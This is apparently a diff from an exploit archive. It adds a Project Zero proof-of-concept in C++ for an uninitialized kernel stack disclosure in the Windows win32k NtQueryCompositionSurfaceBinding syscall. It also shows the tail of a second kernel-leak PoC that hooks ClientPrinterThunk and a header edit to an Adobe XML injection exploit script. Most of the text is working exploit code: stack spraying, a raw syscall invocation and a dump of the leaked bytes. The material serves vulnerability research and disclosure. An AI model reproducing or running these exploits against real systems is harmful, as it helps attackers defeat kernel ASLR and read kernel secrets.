printf("[+] Leaked data: %.8x %.8x\n", LeakedData[0], LeakedData[1]);
}
return globals::OrigClientPrinterThunk(Data);
}
int main() {
// Hook the user32!ClientPrinterThunk callback.
if (!HookUser32DispatchFunction(93, ClientPrinterThunkHook, (PVOID *)&globals::OrigClientPrinterThunk)) {
printf("Hooking ClientPrinterThunk failed.\n");
return 1;
}
// Obtain a print job DC.
PRINTDLGA pd = { 0 };
pd.lStructSize = sizeof(pd);
pd.Flags = PD_RETURNDEFAULT | PD_ALLPAGES | PD_RETURNDC | PD_PRINTTOFILE;
pd.nFromPage = 1;
pd.nToPage = 1;
pd.nCopies = 1;
if (!PrintDlgA(&pd)) {
printf("PrintDlgA failed.\n");
return 1;
}
// Initialize the print job.
DOCINFOA doc_info = { 0 };
doc_info.cbSize = sizeof(doc_info);
doc_info.lpszDocName = "Document";
doc_info.lpszOutput = "C:\\Windows\\Temp\\output";
if (StartDocA(pd.hDC, &doc_info) <= 0) {
printf("StartDoc failed.\n");
return 1;
}
if (StartPage(pd.hDC) <= 0) {
printf("StartPage failed.\n");
return 1;
}
//
// The bug is triggered here.
//
EndPage(pd.hDC);
// Free resources.
EndDoc(pd.hDC);
DeleteDC(pd.hDC);
return 0;
}

119
platforms/windows/dos/42750.cpp Executable file
View file

@ -0,0 +1,119 @@
/*
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1307
We have discovered that the win32k!NtQueryCompositionSurfaceBinding system call discloses portions of uninitialized kernel stack memory to user-mode clients, as tested on Windows 10 32-bit.
The output buffer, and the corresponding temporary stack-based buffer in the kernel are 0x308 bytes in size. The first 4 and the trailing 0x300 bytes are zero'ed out at the beginning of the function:
--- cut ---
.text:0001939B mov [ebp+var_324], ebx
.text:000193A1 push 300h ; size_t
.text:000193A6 push ebx ; int
.text:000193A7 lea eax, [ebp+var_31C]
.text:000193AD push eax ; void *
.text:000193AE call _memset
--- cut ---
However, the remaining 4 bytes at offset 0x4 are never touched, and so they contain whatever data was written there by the previous system call. These 4 bytes are then subsequently leaked to the user-mode caller. Exploitation of this bug is further facilitated by the fact that the contents of the buffer are copied back to user-mode even if the syscall fails (e.g. composition surface handle can't be resolved etc).
The attached proof-of-concept program demonstrates the disclosure by spraying the kernel stack with a large number of 0x41 ('A') marker bytes, and then calling the affected system call. An example output is as follows:
--- cut ---
00000000: 00 00 00 00 41 41 41 41 00 00 00 00 00 00 00 00 ....AAAA........
00000010: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00000020: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00000030: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00000040: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00000050: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
[...]
000002b0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
000002c0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
000002d0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
000002e0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
000002f0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00000300: 00 00 00 00 00 00 00 00 ?? ?? ?? ?? ?? ?? ?? ?? ................
--- cut ---
It is clearly visible here that among all data copied from ring-0 to ring-3, 4 bytes at offset 0x4 remained uninitialized. Repeatedly triggering the vulnerability could allow local authenticated attackers to defeat certain exploit mitigations (kernel ASLR) or read other secrets stored in the kernel address space.
*/
#include <Windows.h>
#include <cstdio>
extern "C"
ULONG WINAPI NtMapUserPhysicalPages(
PVOID BaseAddress,
ULONG NumberOfPages,
PULONG PageFrameNumbers
);
// For native 32-bit execution.
extern "C"
ULONG CDECL SystemCall32(DWORD ApiNumber, ...) {
__asm{mov eax, ApiNumber};
__asm{lea edx, ApiNumber + 4};
__asm{int 0x2e};
}
VOID PrintHex(PBYTE Data, ULONG dwBytes) {
for (ULONG i = 0; i < dwBytes; i += 16) {
printf("%.8x: ", i);
for (ULONG j = 0; j < 16; j++) {
if (i + j < dwBytes) {
printf("%.2x ", Data[i + j]);
}
else {
printf("?? ");
}
}
for (ULONG j = 0; j < 16; j++) {
if (i + j < dwBytes && Data[i + j] >= 0x20 && Data[i + j] <= 0x7e) {
printf("%c", Data[i + j]);
}
else {
printf(".");
}
}
printf("\n");
}
}
VOID MyMemset(PBYTE ptr, BYTE byte, ULONG size) {
for (ULONG i = 0; i < size; i++) {
ptr[i] = byte;
}
}
VOID SprayKernelStack() {
// Buffer allocated in static program memory, hence doesn't touch the local stack.
static BYTE buffer[4096];
// Fill the buffer with 'A's and spray the kernel stack.
MyMemset(buffer, 'A', sizeof(buffer));
NtMapUserPhysicalPages(buffer, sizeof(buffer) / sizeof(DWORD), (PULONG)buffer);
// Make sure that we're really not touching any user-mode stack by overwriting the buffer with 'B's.
MyMemset(buffer, 'B', sizeof(buffer));
}
int main() {
// Windows 10 1607 32-bit.
CONST ULONG __NR_NtQueryCompositionSurfaceBinding = 0x13e0;
// Convert thread to GUI.
LoadLibrary(L"user32.dll");
// Spray the kernel stack to get visible results of the memory disclosure.
SprayKernelStack();
// Trigger the bug and display the output.
BYTE OutputBuffer[0x308] = { /* zero padding */ };
SystemCall32(__NR_NtQueryCompositionSurfaceBinding, 0, 0, OutputBuffer);
PrintHex(OutputBuffer, sizeof(OutputBuffer));
return 0;
}

3
platforms/xml/webapps/41855.sh
View file

@ -1,6 +1,5 @@
#!/bin/bash
#
# Source: https://raw.githubusercontent.com/tsluyter/exploits/master/adobe_xml_inject.sh
# Exploit Title: Adobe XML Injection file content disclosure
# Date: 07-04-2017
# Exploit Author: Thomas Sluyter
@ -225,4 +224,4 @@ do
done
ExitCleanup 0
ExitCleanup 0